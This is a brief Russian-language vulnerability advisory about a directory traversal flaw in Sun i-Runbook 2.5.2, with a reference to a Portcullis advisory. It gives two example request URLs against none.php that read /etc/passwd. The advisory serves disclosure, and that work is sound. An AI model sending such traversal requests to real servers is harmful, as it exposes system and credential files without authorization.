Раскрытие содержание директории и файлов в Sun i-Runbook

Дата публикации:
15.07.2002
Всего просмотров:
681
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Sun i-Runbook система технического и административного обслуживания продуктов Sun со встроенным Web интерфейсом. Специально обработанный запрос с абсолютным путем к каталогу или файлу приведет к раскрытию такого каталога или файла. Пример:
http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:. .:..:etc:passwd: 

http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd
уязвимость обнаружена в Sun i-Runbook 2.5.2

Ссылки: Portcullis Security Advisory - Directory Traversal Vulnerability in SunPS iRunbook 2.5.2
или введите имя

CAPTCHA